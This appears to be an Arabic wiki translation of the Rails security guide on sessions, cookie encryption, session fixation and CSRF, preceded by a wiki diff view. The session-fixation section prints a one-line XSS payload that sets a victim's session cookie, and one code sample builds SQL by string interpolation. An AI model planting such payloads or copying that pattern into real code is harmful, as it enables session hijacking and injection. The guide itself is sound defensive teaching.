(Model.find(id او (Model.find_by_some thing(something يطبق هذا الإجراء تلقائيًا. ولكن في تجزئة SQL، خاصة في شروط التجزئة (where("...")) أو توابع ()connection.execute أو ()Model.find_by_sql، يجب أن تطبق يدويًا.
+
<nowiki>#</nowiki> استخدام القيم الحرفية
  
بدلاً من تمرير سلسلة إلى خيار الشروط، يمكنك تمرير مصفوفة لتعقيم السلاسل الملوثة مثل:
+
class PostsController < ApplicationController
  
Model.where("login = ? AND password = ?", entered_user_name, entered_password).first
+
 content_security_policy do |p|
 +
 
 +
   p.base_uri "<nowiki>https://www.example.com</nowiki>"
 +
 
 +
 end
 +
 
 +
End
 +
 
 +
<nowiki>#</nowiki> باستخدام قيم مختلطة وديناميكية مختلطة
 +
 
 +
class PostsController < ApplicationController
 +
 
 +
 content_security_policy do |p|
 +
 
 +
   p.base_uri :self, -> { "<nowiki>https://#{current_user.domain}.example.com</nowiki>" }
 +
 
 +
 end
 +
 
 +
End
 +
 
 +
<nowiki>#</nowiki> تعطيل CSP العام
 +
 
 +
class LegacyPagesController < ApplicationController
 +
 
 +
 content_security_policy false, only: :index
 +
 
 +
End
 +
 
 +
استخدم سمة التكوين content_security_policy_report_only لتعيين Content-Security-Policy-Report-Only للإبلاغ عن انتهاكات المحتوى فقط لترحيل المحتوى القديم
 +
 
 +
<nowiki>#</nowiki> config/initializers/content_security_policy.rb
 +
 
 +
Rails.application.config.content_security_policy_report_only = true
 +
 
 +
<nowiki>#</nowiki>تجاوز وحدة التحكم
 +
 
 +
class PostsController < ApplicationController
 +
 
 +
 content_security_policy_report_only only: :index
 +
 
 +
End
 +
 
 +
يمكنك تمكين إنشاء nonce التلقائي:
 +
 
 +
<nowiki>#</nowiki> config/initializers/content_security_policy.rb
 +
 
 +
Rails.application.config.content_security_policy do |policy|
 +
 
 +
 policy.script_src :self, :https
 +
 
 +
end
 +
 
 +
Rails.application.config.content_security_policy_nonce_generator = -> request { SecureRandom.base64(16) }
 +
 
 +
بعد ذلك، يمكنك إضافة قيمة عدم تحديد تلقائي عن طريق تمرير إشارة nonce: true كجزء من.html_options مثال:
 +
 
 +
<%= javascript_tag nonce: true do -%>
 +
 
 +
 alert('Hello, World!');
 +
 
 +
<% end -%>
 +
 
 +
نفس الشيء يعمل مع javascript_include_tag:
 +
 
 +
<%= javascript_include_tag "script", nonce: true %>
 +
 
 +
استخدم المساعد csp_meta_tag لإنشاء علامة وصفية "csp-nonce" بقيمة nonce لكل جلسة للسماح بالعلامات <script> المضمنة.
 +
 
 +
<head>
 +
 
 +
 <%= csp_meta_tag %>
 +
 
 +
</head>
 +
 
 +
يستخدم بواسطة مساعد Rails UJS لإنشاء عناصر <script> مضمنة بشكل ديناميكي.
 +
 
 +
== الأمن البيئي ==
 +
إنه خارج نطاق هذا الدليل لإعلامك بكيفية تأمين رمز التطبيق والبيئات الخاصة بك. ومع ذلك، يرجى تأمين تكوين قاعدة البيانات، على سبيل المثال، config / database.yml، وسر الخادم الخاص بك، على سبيل المثال، المخزنة في config / secrets.yml. قد ترغب في فرض قيود إضافية على الوصول باستخدام إصدارات خاصة بهذه البيئة من هذه الملفات وأي إصدارات أخرى قد تحتوي على معلومات حساسة.
 +
 
 +
=== بيانات الإعتماد المخصصة ===
 +
ينشئ Rails تكوين / credentials.yml.enc لتخزين بيانات اعتماد جهة خارجية داخل repo. هذا قابل للتطبيق فقط لأن Rails تشفر الملف باستخدام مفتاح رئيسي أنشأ في عنصر تحكم إصدار تجاهل config / master.key - سوف يبحث Rails أيضًا عن هذا المفتاح في ["ENV ["RAILS_MASTER_KEY. تتطلب Rails أيضًا مفتاح التمهيد في الإنتاج، لذلك يمكن قراءة بيانات الاعتماد.
 +
 
 +
لتحرير بيانات الاعتماد المخزنة، استخدم بيانات اعتماد bin / rails: edit.
 +
 
 +
بشكل افتراضي، يحتوي هذا الملف على secret_key_base للتطبيق، ولكن يمكن استخدامه أيضًا لتخزين بيانات اعتماد أخرى مثل مفاتيح الوصول لواجهات برمجة التطبيقات الخارجية.
  
كما ترى، الجزء الأول من المصفوفة عبارة عن جزء SQL يحتوي على علامات استفهام. الإصدارات المعقمة للمتغيرات في الجزء الثاني من المصفوفة تحل محل علامات الاستفهام. أو يمكنك تمرير تجزئة لنفس النتيجة:
+
يمكن الوصول إلى بيانات الاعتماد المضافة إلى هذا الملف عبر Rails.application.credentials. على سبيل المثال، باستخدام الإعدادات التالية decrypted config / credentials.yml.enc:
  
Model.where(login: entered_user_name, password: entered_password).first
+
secret_key_base: 3b7cd727ee24e8444053437c36cc66c3
  
نموذج المصفوفة أو التجزئة متاح فقط في الحالات النموذجية. يمكنك محاولة() sanitize_sql في مكان آخر. اجعلها عادة التفكير في العواقب الأمنية عند استخدام سلسلة خارجية في SQL.
+
some_api_key: SOMEKEY
  
=== البرمجة عبر المواقع (XSS) ===
+
Rails.application.credentials.some_api_key بإرجاع SOMEKEY في أي بيئة.
ملاحظة: الأكثر انتشارًا، وأحد أكثر نقاط الضعف الأمنية تدميراً في تطبيقات الويب هو XSS. هذا الهجوم الخبيث يضخ رمزًا تنفيذيًا من جانب العميل. يوفر Rails طرق المساعد لإيقاف هذه الهجمات.
 
  
==== نقاط الدخول ====
+
إذا كنت تريد رفع استثناء عندما يكون مفتاح ما فارغًا، فاستخدم إصدار bang:
نقطة الإدخال هي عنوان URL ضعيف ومعاملاته حيث يمكن للمهاجم بدء هجوم.
 
  
ونقاط الدخول الأكثر شيوعًا هي منشورات الرسائل وتعليقات المستخدمين وكتب الزائرين، ولكن عناوين المشروعات وأسماء المستندات وصفحات نتائج البحث كانت أيضًا عرضة - في كل مكان حيث يمكن للمستخدم إدخال البيانات. ولكن لا يجب بالضرورة أن تأتي المدخلات من مربعات الإدخال على مواقع الويب، يمكن أن تكون في أي معامل URL - واضحة أو مخفية أو داخلية. تذكر أن المستخدم قد اعترض أي حركة المرور. تجعل التطبيقات أو وكلاء موقع العميل من السهل تغيير الطلبات. هناك أيضا ناقلات هجوم أخرى مثل إعلانات لافتة.
+
Rails.application.credentials.some_api_key! # => raises KeyError: :some_api_key is blank
  
يهاجم XSS العمل مثل هذا: يحقن أحد المهاجمين بعض الرموز، ويحفظه تطبيق الويب ويعرضه على صفحة، يُقدم لاحقًا إلى أحد الضحايا. تعرض معظم أمثلة XSS ببساطة صندوق تنبيه، لكنها أقوى من ذلك. يمكن لـ XSS سرقة ملف تعريف الارتباط، أو خطف الجلسة، أو إعادة توجيه الضحية إلى موقع ويب مزيف، أو عرض إعلانات لصالح المهاجم، أو تغيير العناصر على موقع الويب للحصول على معلومات سرية أو تثبيت برامج ضارة من خلال ثغرات أمنية في متصفح الويب.
+
== موارد إضافية ==
 +
يتغير المشهد الأمني ومن المهم الحفاظ على تحديثه، لأن فقدان الثغرات الأمنية قد يكون كارثيا. يمكنك العثور على موارد إضافية حول أمان (Rails) هنا:
 +
* اشترك في قائمة بريد الأمن لـ Rails.
 +
* Brakeman - Rails Security Scanner - لإجراء تحليل أمان ثابت لتطبيقات Rails.
 +
* مواكبة على طبقات التطبيق الأخرى (لديهم رسالة إخبارية أسبوعية أيضا).
 +
* مدونة أمان جيدة بما في ذلك ورقة Cheat في البرمجة النصية عبر المواقع.
  
خلال النصف الثاني من عام 2007، سجلت 88 نقطة ضعف في متصفحات موزيلا، 22 في سفاري، 18 في IE، و 12 في الأوبرا. كما وثق تقرير التهديدات العالمية لأمن الإنترنت من سيمانتك 239 نقطة ضعف في المتصفح في الأشهر الستة الأخيرة من عام 2007. ويعد Mpack إطارًا نشطًا وحديثًا للهجوم يستغل هذه الثغرات الأمنية. بالنسبة للمتسللين الإجراميين، فإنه من الأمور الجذابة للغاية استغلال ثغرة SQL-Injection في إطار تطبيق ويب وإدراج شفرة خبيثة في كل عمود جدول نصي. في أبريل / نيسان 200 ، اخترق أكثر من 510،000 موقع من هذا النوع، من بينها الحكومة البريطانية والأمم المتحدة والعديد من الأهداف البارزة.
+
== المراجع: ==
 +
تأمين تطبيقات Rail.

مراجعة 16:04، 8 مارس 2019

تأمين تطبيقات ريلز

يصف هذا الدليل مشاكل الأمان الشائعة في تطبيقات الويب وكيفية تجنبها باستخدام ريلز. بعد قراءة هذا الدليل، ستتلعم:

  • جميع التدابير المضادة التي سيسلط الضوء عليها.
  • مفهوم الجلسات (sessions) في ريلز، و ما يُنفذ في وجود وسائل الهجوم المعروفة.
  • كيف يمكن أن يكون مجرد زيارة أحد المواقع مشكلة أمنية (مع CSRF).
  • ما عليك الانتباه عند العمل مع الملفات أو توفير واجهة إدارة.
  • كيفية إدارة المستخدمين: تسجيل الدخول والخروج وهجمات الطرق على جميع الطبقات.
  • أكثر الطرق المعروفة لهجوم الحقن.

المقدمة

تعمل إطارات تطبيقات الويب لمساعدة المطورين على بناء تطبيقات الويب. كما يساعد بعضها أيضًا في تأمين تطبيق الويب. في الواقع، لا يكون إطار واحد أكثر أمانًا من الآخر: إذا كنت تستخدمه بشكل صحيح، فستتمكن من إنشاء تطبيقات آمنة مع العديد من الأطر. لدى ريلز بعض التوابع المساعدة الذكية، على سبيل المثال ضد حقن SQL، بحيث لا يعد هذا مشكلة.

بشكل عام لا يوجد شيء مثل مكونات الأمن سهلة الإستخدام. يعتمد الأمن على الأشخاص الذين يستخدمون الإطار، وأحيانًا على طريقة التطوير. ويعتمد ذلك على جميع طبقات بيئة تطبيقات الويب: التخزين الخلفي (back-end storage) وخادم الويب وتطبيق الويب نفسه (وربما طبقات أو تطبيقات أخرى).

ومع ذلك، تقدر مجموعة غارتنر (Gartner Group) أن 75٪ من الهجمات موجودة على طبقة تطبيقات الويب، ووجدت أن "من بين 300 موقع مدقق، 97٪ منهم عرضة للهجوم". وذلك لأن من السهل نسبيًا استخدام تطبيقات الويب، حيث يسهل فهمها والتعامل معها، حتى من قبل الشخص العادي.

تتضمن التهديدات ضد تطبيقات الويب سرقة حساب المستخدم ، أو تجاوز التحكم في الوصول، أو قراءة أو تعديل البيانات الحساسة، أو عرض محتوى احتيالي. أو قد يتمكن أحد المهاجمين من تثبيت برنامج حصان طروادة (Trojan horse program) أو برنامج إرسال بريد إلكتروني غير مرغوب فيه، ويهدف إلى الإثراء المالي أو التسبب في تلف اسم العلامة التجارية عن طريق تعديل موارد الشركة. من أجل منع الهجمات وتقليل تأثيرها وإزالة نقاط الهجوم، عليك أولاً وقبل كل شيء أن تفهم تماما أساليب الهجوم من أجل إيجاد الإجراءات المضادة الصحيحة. هذا ما يهدف إليه هذا الدليل.

من أجل تطوير تطبيقات الويب الآمنة، يجب عليك مواكبة جميع الطبقات ومعرفة أعدائك. لمواكبة الاشتراك في قوائم بريدية أمنية، اقرأ مدونات الأمان وأجري عمليات الفحص والتحديثات الأمنية بشكل دوري (راجع فصل "الموارد الإضافية" في الأسفل). يُعمل ذلك يدويا لأن هذا هو كيف تجد مشاكل أمنية منطقية سيئة.

الجلسات

المكان لجيد لبدء البحث عن الأمان هو الجلسات، والتي يمكن أن تكون عرضةً لهجمات معينة.

ما هي الجلسات؟

ملاحظة: البروتوكول HTTP هو بروتوكول عديم الحالة. الجلسات تجعله ذي حالة (stateful).

تحتاج معظم التطبيقات إلى تتبع حالة معينة لمستخدم معين. قد تكون هذه محتويات سلة التسوق أو معرف المستخدم للمستخدم الذي قام بتسجيل الدخول حاليًا. بدون فكرة الجلسات، يجب على المستخدم تحديد وربما الاستيثاق على كل طلب. ستنشئ ريلز جلسة جديدة تلقائيًا إذا قام مستخدم جديد بالوصول إلى التطبيق. وستحمل جلسة موجودة إذا كان المستخدم قد استخدم التطبيق بالفعل.

عادةً ما تتكون الجلسة من جدول Hash من القيم ومعرف الجلسة، ,عادة ما تتكون من سلسلة 32 حرف، لتحديد ذلك الجدول. يتضمن كل ملف تعريف ارتباط (cookie) يُرسَل إلى متصفح العميل معرف الجلسة. وفي الاتجاه الآخر: يرسل المتصفح إلى الخادم كل طلب من العميل. في ريلز، يمكنك حفظ واسترجاع القيم باستخدام التابع session:

session[:user_id] = @current_user.id
User.find(session[:user_id])

معرف الجلسة

ملاحظة: معرف جلسة العمل عبارة عن سلسلة ست عشرية عشوائية تتكون من 32 محرف.

تُنشأ معرّف جلسة العمل باستخدام SecureRandom.hex الذي ينشئ سلسلة ست عشرية عشوائية باستخدام توابع خاصة بالمنصة (مثل OpenSSL أو ‎/dev/urandom أو Win32 CryptoAPI) لإنشاء أرقام عشوائية آمنة مشفرة. في الوقت الحالي ليس من الممكن إجهاض المعرفات الخاصة بجلسات ريلز.

اختطاف الجلسة

تحذير: يتيح سرقة معرف جلسة المستخدم لمهاجم استخدام تطبيق الويب باسم الضحية.

تحتوي العديد من تطبيقات الويب على نظام الاستيثاق: يوفر المستخدم اسم مستخدم وكلمة مرور، ويفحصهما تطبيق الويب ثم يخزن معرف المستخدم المقابل في جدول Hash للجلسة. من الآن فصاعدا، الجلسة صالحة. في كل طلب، سيحمل التطبيق المستخدم المحدد بواسطة معرف المستخدم في الجلسة، دون الحاجة إلى استيثاق جديد. يحدد معرف الجلسة في ملف تعريف الارتباط جلسة العمل.

بعد ذلك، فإن ملف تعريف الارتباط بمثابة استيثاق مؤقت لتطبيق الويب. أي شخص يستغل ملف تعريف ارتباط من شخص آخر قد يستخدم تطبيق الويب باسم هذا المستخدم - مع احتمال حدوث عواقب وخيمة. في ما يلي بعض الطرق لاختطاف جلسة، وإجراءاتها المضادة:

  • تحسس ملف تعريف الارتباط (cookie) في شبكة غير آمنة. يمكن أن تكون الشبكة المحلية اللاسلكية مثالًا على مثل هذه الشبكة. في شبكة LAN لاسلكية غير مشفرة، من السهل جدًا الاستماع إلى حركة مرور جميع العملاء المتصلين. بالنسبة إلى أداة إنشاء تطبيقات الويب ، فهذا يعني توفير اتصال آمن عبر طبقة المقابس الآمنة. في ريلز 3.1 والإصدارات الأحدث، تحقق ذلك عن طريق فرض اتصال SSL دائمًا في ملف تهيئة التطبيق الخاص بك:
config.force_ssl = true
  • معظم الناس لا يمسحون ملفات تعريف الارتباط بعد العمل في أماكن عامة (مثل مقاهي الإنترنت). لذلك، إذا لم يسجل المستخدم الأخير الخروج من تطبيق ويب، فسيتمكن غيره من استخدامه باسم هذا المستخدم. قدم للمستخدم زر تسجيل الخروج في تطبيق الويب، واجعله بارزًا.
  • تهدف العديد من عمليات استغلال البرامج النصية عبر المواقع (XSS) إلى الحصول على ملف تعريف الارتباط الخاص بالمستخدم. ستقرأ المزيد عن XSS لاحقًا.
  • بدلاً من سرقة ملف تعريف ارتباط غير معروف للمهاجم، يجري إصلاح مُعرِّف جلسة المستخدم (في ملف تعريف الارتباط) المعروف لهم. اقرأ المزيد حول ما يسمى بتثبيت الجلسة لاحقًا.

الهدف الرئيسي لمعظم المهاجمين هو كسب المال. تتراوح الأسعار السرية لحسابات تسجيل الدخول المسروقة للبنوك من 10 إلى 1000 دولار (اعتمادًا على المبلغ المتاح للأموال)، و 0.40 إلى 20 دولارًا لأرقام بطاقات الائتمان، و 1 إلى 8 دولارات لحسابات مواقع المزادات على الإنترنت، و 4 - 30 دولارًا لكلمات مرور البريد الإلكتروني، وفقًا لتقرير تهديد أمن الإنترنت العالمي من سيمانتك.

إرشادات الجلسة

فيما يلي بعض الإرشادات العامة حول الجلسات.

  • لا تخزن أشياءً كبيرةً في جلسة واحدة. بدلًا من ذلك، يجب تخزينها في قاعدة البيانات وحفظ معرّفها في الجلسة. سيؤدي ذلك إلى التخلص من صداع التزامن ولن يملأ مساحة التخزين الخاصة بالجلسة (حسب سعة التخزين التي اخترتها، انظر أدناه). ستكون هذه فكرة جيدة أيضًا، إذا قمت بتعديل بنية كائن وما زالت الإصدارات القديمة منه موجودةً في ملفات تعريف الارتباط الخاصة بمستخدم ما. من خلال تخزين جلسات من جانب الخادم، يمكنك مسح الجلسات، ولكن مع التخزين من جانب العميل، يكون من الصعب التخفيف من ذلك.
  • يجب عدم تخزين البيانات المهمة في الجلسة. إذا مسح المستخدم ملفات تعريف الارتباط الخاصة به أو أغلق المتصفح، فستُفقَد البيانات. أضف إلى ذلك أنَّه باستخدام وحدة التخزين على جانب العميل، يمكن للمستخدم قراءة البيانات.

تخزين الجلسة المشفرة

ملاحظة: يوفر ريلز العديد من آليات التخزين لجداول Hash لجلسة العمل. الأكثر أهمية هو ActionDispatch::Session::CookieStor.

يحفظ CookieStore جدول Hash للجلسة مباشرة في ملف تعريف الارتباط من جانب العميل. يسترد الخادم الجدول Hash لجلسة العمل من ملف تعريف الارتباط ويلغي الحاجة إلى معرِّف جلسة العمل. سيزيد ذلك من سرعة التطبيق بشكل كبير، لكنه خيار تخزين مثير للجدل وعليك التفكير في الآثار الأمنية وقيود التخزين الخاصة به:

  • تتطلب ملفات تعريف الارتباط حدًا صارمًا للحجم يبلغ 4 كيلوبايت. هذا جيد، حيث لا يجب تخزين كميات كبيرة من البيانات في الجلسة على أي حال، كما هو موضح سابقًا. تخزين معرف قاعدة بيانات المستخدم الحالي في جلسة هو ممارسة شائعة.
  • ملفات تعريف الارتباط الخاصة بالجلسات لا تنهي صلاحيتها بنفسها وقد يعاد استخدامها بشكل ضار. قد يكون من الجيد أن يؤدي تطبيقك إلى إبطال ملفات تعريف ارتباط الجلسة القديمة باستخدام طابع زمني مخزن.

يستخدم CookieStore مخزن ملف تعريف الارتباط المشفر (encrypted cookie jar) لتوفير موقع آمن ومشفر لتخزين بيانات الجلسات. وبالتالي، توفر الجلسات المستندة إلى ملفات تعريف الارتباط كلًّا من الأمان والسرية لمحتوياتها. يُشتق مفتاح التشفير، بالإضافة إلى مفتاح التحقق المستخدم لملفات تعريف الارتباط الموقعة، من قيمة الضبط secret_key_base.

بدءًا من الإصدار 5.2 من ريلز، تحمى ملفات تعريف الارتباط والجلسات المشفرة باستخدام تشفير AES GCM. هذا النوع من التشفير هو نوع من التشفير والاستيثاق الزوجي والتشفير في خطوة واحدة في حين تنتج أيضا نصوصًا أقصر مقارنة مع الخوارزميات الأخرى المستخدمة سابقا. يُشتق مفتاح ملفات تعريف الارتباط المشفرة مع AES GCM باستخدام قيمة زائدة محددة بواسطة القيمة config.action_dispatch.authenticated_encrypted_cookie_salt.

قبل هذا الإصدار، تُأمَّن ملفات تعريف الارتباط المشفرة باستخدام AES في الوضع CBC مع HMAC باستخدام SHA1 للاستيثاق. اشتقت مفاتيح هذا النوع من التشفير والتحقق من HMAC من خلال القيم الزائدة التي حددها config.action_dispatch.encrypted_cookie_salt و config.action_dispatch.encrypted_signed_cookie_salt على التوالي.

قبل الإصدار 4 من ريلز في كلا الإصدارين 2 و 3، كانت تُحمَى ملفات تعريف الارتباط الخاصة بالجلسات باستخدام التحقق من HMAC فقط. على هذا النحو، لم توفر ملفات تعريف الارتباط الخاصة بهذه الجلسة سوى سلامة المحتوى الخاص بها لأن بيانات الجلسة الفعلية خُزنت في نص عادي مشفر باعتباره base64. هذه هي الطريقة التي تعمل بها ملفات تعريف الارتباط في الإصدار الحالي من ريلز. لا تزال هذه الأنواع من ملفات تعريف الارتباط مفيدة لحماية سلامة بعض البيانات والمعلومات المخزنة من قبل العميل.

لا تستخدم كلمة سر تافهً لـ secret_key_base، أي كلمة من القاموس، أو ذات حروف أقل من 30 حرفًا! بدلًا من ذلك، استخدم rails secret لتوليد مفاتيح سرية!

من المهم أيضًا استخدام قيم زائدة مختلفة لملفات تعريف الارتباط المشفرة والموقعة. قد يؤدي استخدام نفس القيمة لقيم ضبط القيمة الزائدة (salt configuration values) المختلفة إلى نفس المفتاح المشتق المستخدم لميزات أمان مختلفة؛ وهذا قد يؤدي بدوره إلى إضعاف قوة المفتاح.

في تطبيقات الاختبار والتطوير، احصل على secret_key_base مشتق من اسم التطبيق. يجب أن تستخدم البيئات الأخرى مفتاحًا عشوائيًا موجودًا في config/credentials.yml.enc، كما هو موضح هنا في حالة فك تشفيرها:

secret_key_base: 492f...

إذا تلقيت طلبًا عرض فيه كلمة السر (على سبيل المثال أحد التطبيقات التي تمت مشاركة مصدرها)، ففكر بشدة في تغيير كلمة السر.

تدوير إعدادات ملفات تعريف الارتباط المشفرة والموقعة

يُعد التدوير (Rotation) مثاليًا لتغيير ضبط ملفات تعريف الارتباط وضمان عدم صلاحية ملفات تعريف الارتباط القديمة على الفور. عندئذٍ، ستتاح الفرصة للمستخدمين لديك لزيارة موقعك، وقراءة ملفات تعريف الارتباط الخاصة بهم مع تهيئة قديمة وإعادة كتابتها مع التغيير الجديد. يمكن بعد ذلك إزالة التدوير بعد أن تكون مطمئنًّا بما يكفي من امتلاك المستخدمين الفرصة لتحديث ملفات تعريف الارتباط الخاصة بهم.

من الممكن تدوير الأصفار والخدمات المستخدمة لملفات تعريف الارتباط المشفرة والموقعة.

على سبيل المثال، لتغيير القيمة المشفرة المختصرة (digest) المستخدمة لملفات تعريف الارتباط المشفرة الموقعة من SHA1 إلى SHA256، يجب أولًا تعيين قيمة الضبط الجديدة:

Rails.application.config.action_dispatch.signed_cookie_digest = "SHA256"

أضف الآن تدويرًا للقيمة المشفرة عبر SHA1 المختصرة القديمة بحيث تُحدث ملفات تعريف الارتباط الحالية بسلاسة إلى القيمة المشفرة عبر SHA256 المختصرة الجديدة.

Rails.application.config.action_dispatch.cookies_rotations.tap do |cookies|
  cookies.rotate :signed, digest: "SHA1"
end

ثم ستُحسَب القيمة المشفرة المختصرة لأي ملفات تعريف الارتباط المكتوبة باستخدام SHA256. لا يزال من الممكن قراءة ملفات تعريف الارتباط القديمة التي كُتبت باستخدام SHA1، وإذا جرى الوصول إليها آنذاك، سيعاد كتابتها مع القيمة المشفرة المختصرة الجديد بحيث يجري ترقيتها ولن تكون غير صالحة عند إزالة التدوير.

وبمجرد أن لم يعد لدى المستخدمين الذين يملكون ملفات تعريف الارتباط الموقعة ذات القيمة المختصرة والمشفرة عبر SHA1 فرصةً لإعادة كتابة ملفات تعريف الارتباط الخاصة بهم، أزل الدوران.

على الرغم من أنه يمكنك إعداد العديد من عمليات التدوير على الوجه الذي تريد، فمن غير المعتاد إجراء العديد من التدويرات في وقت واحد.

لمزيد من التفاصيل حول تدوير المفاتيح مع الرسائل المشفرة والموقعة بالإضافة إلى الخيارات المختلفة التي يقبلها التابع rotate، يرجى الرجوع إلى توثيق واجهة برمجة تطبيقات MessageEncryptor و MessageVerifier.

هجمات الإعادة على جلسات CookieStore

ملاحظة: نوع آخر من الهجوم عليك أن تكون على دراية به عند استخدام CookieStore هو هجوم الإعادة (replay attack).

تُنفَّذ هذه الهجمات بالشكل التالي:

  • يتلقى المستخدم كمية مبلغ المال، ثم يخزن المبلغ في جلسة (وهي فكرة سيئة على أي حال، لكننا سنفعل ذلك لأغراض العرض التوضيحي).
  • يشتري المستخدم شيئًا.
  • تخزين قيمة المبلغ المعدلة الجديدة في الجلسة.
  • يأخذ المستخدم ملف تعريف الارتباط من الخطوة الأولى (الذي نسخوه مسبقًا) ويستبدل ملف تعريف الارتباط الحالي في المتصفح.
  • يمتلك المستخدم رصيده الأصلي مرة أخرى.

تضمين رقم خاص (nonce، وهو قيمة عشوائية) في الجلسة يقي من هجمات الإعادة. يكون الرقم الخاص صالحًا مرة واحدة فقط، ويتعين على الخادم تتبع جميع الأرقام الخاصة الصالحة. يصبح الأمر أكثر تعقيدًا إذا كان لديك عدة خوادم للتطبيق. من شأن تخزين الأرقام الخاصة في جدول قاعدة بيانات أن يهزم الهدف الكامل لـ CookieStore (تجنب الوصول إلى قاعدة البيانات).

أفضل حل لذلك هو عدم تخزين هذا النوع من البيانات في الجلسة، ولكن في قاعدة البيانات. في هذه الحالة، خزن الرصيد في قاعدة البيانات و login_in_user_id في الجلسة.

تثبيت الجلسة

ملاحظة: بصرف النظر عن سرقة معرف جلسة المستخدم، قد يُصلِح المهاجم معرف جلسة يعرفه ويجبر الضحية على استعماله، وهذا ما يسمى "تثبيت الجلسة" (Session Fixation).

[[ملف:session_fixation_Rails.png|بديل=خطوات تثبيت جلسة ذات معرف معلوم من طرف المهاجم وتوضيح كيفية خداع المستخدم لاستعمال معرف الجلسة ذاك وإنجاز الاستيثاق للمهاجم.|تصغير|خطوات تثبيت جلسة ذات معرف معلوم من طرف المهاجم وتوضيح كيفية خداع المستخدم لاستعمال معرف الجلسة ذاك وإنجاز الاستيثاق للمهاجم.]]

يركز هذا الهجوم على إصلاح معرِّف جلسة المستخدم المعروف للمهاجم، وإجبار متصفح المستخدم على استخدام هذا المعرف. لذلك، ليس من الضروري أن يسرق المهاجم معرف الجلسة بعد ذلك. إليك كيف يعمل هذا الهجوم:

  • يُنشئ المهاجم معرف جلسة صالح: يُحمِّل صفحة تسجيل الدخول الخاصة بتطبيق الويب حيث يريد إصلاح جلسة العمل، ثم يأخذ معرف جلسة العمل الموجود في ملف تعريف الارتباط من الاستجابة (راجع الرقمين 1 و 2 في الصورة).
  • يحتفظ المهاجم بالجلسة عن طريق الوصول إلى تطبيق الويب بشكل دوري من أجل منع انتهاء صلاحية الجلسة وإبقائها على قيد الحياة.
  • يفرض المهاجم على متصفح المستخدم استخدام معرف جلسة العمل هذا (راجع رقم 3 في الصورة). نظرًا لأنه لا يجوز لك تغيير ملف تعريف ارتباط لنطاق آخر (بسبب سياسة المصدر الواحد [same origin policy])، يجب على المهاجم تشغيل JavaScript من مجال تطبيق الويب المستهدف. ينفَّذ هذا الهجوم عبر حقن شيفرة JavaScript في التطبيق بواسطة XSS. إليك مثال على ذلك:
<script>document.cookie="_session_id=16d5b78abb28e3d6206b60f22a03c8d9";</script>

سنتطرق إلى الهجوم XSS والحقن في وقت لاحق.

  • يغري المهاجم الضحية إلى الصفحة المصابة بشيفرة JavaScript. من خلال عرض الصفحة، سيغير متصفح الضحية معرف الجلسة إلى معرف الجلسة الملغوم الذي يمثِّل الفخ.
  • لمَّا كان معرف الجلسة الملغوم الجديد غير مستخدم بعد، فسيطلب تطبيق الويب من المستخدم إجراء استيثاق.
  • من الآن فصاعدا، سيتشارك الضحية والمهاجم استخدام تطبيق الويب مع الجلسة نفسها، إذ أصبحت الجلسة صالحة ولم يلاحظ الضحية الهجوم الذي حصل.

تثبيت الجلسة - التدابير الوقائية

تنبيه: سطر واحد من التعليمات البرمجية سوف يحميك من هجوم تثبيت الجلسة.

إن الإجراء المضاد الأكثر فاعلية هو إصدار معرف جلسة عمل جديد وإعلان أن الرقم القديم غير صالح بعد تسجيل الدخول بنجاح. بهذه الطريقة، لا يمكن للمهاجم استخدام معرف جلسة العمل الثابتة. هذا هو مضاد جيد ضد اختطاف الجلسة أيضًا. فيما يلي كيفية إنشاء جلسة جديدة في ريلز:

reset_session

إذا كنت تستخدم الجوهرة Devise الشائعة لإدارة المستخدمين، فستنتهي الجلسات تلقائيًا عند تسجيل الدخول وتسجيل الخروج نيابة عنك. إذا قمت بالتدوير الخاص بك، تذكر أن تنهي صلاحية الجلسة بعد تسجيل الدخول (عند إنشاء الجلسة). سيؤدي هذا إلى إزالة القيم من الجلسة، وبالتالي يتعين عليك نقلها إلى الجلسة الجديدة.

ومن التدابير المضادة الأخرى حفظ الخصائص الخاصة بمستخدم محدد في الجلسة، والتحقق منها في كل مرة يأتي فيها طلب، ورفض الوصول إذا كانت المعلومات غير متطابقة. يمكن أن تكون هذه الخصائص هي عنوان IP البعيد أو وكيل المستخدم (اسم مستعرض ويب)، على الرغم من أن الأخير غير مرتبط بمستخدم محدَّد بشدة. عند حفظ عنوان IP، يجب أن تضع في حسبانك أن هناك مزودي خدمة إنترنت أو مؤسسات كبيرة تضع مستخدميها خلف الوكلاء (proxies). قد تتغير هذه الخصائص على مدار الجلسة، لذلك لن يتمكن هؤلاء المستخدمون من استخدام التطبيق الخاص بك، أو سيستخدموه ولكن بشكل محدود فقط.

انتهاء الجلسة

ملاحظة: توسع الجلسات التي لا تنتهي صلاحيتها إطلاقًا الإطار الزمني لاحتمالية حدوث عدَّة هجمات مثل التزوير عبر الموقع (CSRF) واختطاف الجلسة وتثبيت الجلسة.

أحد الاحتمالات هو تعيين الطابع الزمني لإنتهاء صلاحية ملف تعريف الارتباط مع معرف جلسة العمل. ومع ذلك، يمكن للعميل تحرير ملفات تعريف الارتباط التي تخزن في متصفح الويب بحيث تصبح الجلسات المنتهية على الخادم أكثر أمانًا. فيما يلي مثال حول كيفية انهاء صلاحية الجلسات في جدول قاعدة البيانات. استدعي ("Session.sweep ("20 minutes لإنهاء الجلسات التي استُخدمت منذ أكثر من 20 دقيقة.

class Session < ApplicationRecord
  def self.sweep(time = 1.hour)
    if time.is_a?(String)
      time = time.split.inject { |count, unit| count.to_i.send(unit) }
    end
 
    delete_all "updated_at < '#{time.ago.to_s(:db)}'"
  end
end

قدم القسم السابق الذي يشرح "تثبيت الجلسة" مشكلة الحفاظ على الجلسات. يمكن للمهاجم الذي يحافظ على جلسة تنتهي كل خمس دقائق أن يبقى الجلسة حية إلى الأبد، على الرغم من أنك قد انتهيت من الجلسات. سيكون الحل البسيط لهذا هو إضافة العمود created_at إلى جدول الجلسات. الآن يمكنك حذف الجلسات التي أُنشئت منذ وقت طويل. استخدم هذا الخط في التابع sweep أعلاه:

delete_all "updated_at < '#{time.ago.to_s(:db)}' OR
  created_at < '#{2.days.ago.to_s(:db)}'"

تزوير الطلب عبر المواقع (CSRF)

تعمل طريقة الهجوم هذه على تضمين شفرة خبيثة أو ارتباط في صفحة تصل إلى تطبيق ويب يُعتقَد أن المستخدم قد أجرى استيثاقًا معه. إذا لم تنقضي مهلة جلسة تطبيق الويب، فقد ينفذ المهاجم أوامر غير مصرح بها.

[[ملف:csrf_refactoring.png|بديل=رسم توضيحي لهجمات تزوير الطلب عبر المواقع (CSRF).|تصغير|رسم توضيحي لهجمات تزوير الطلب عبر المواقع (CSRF).]]

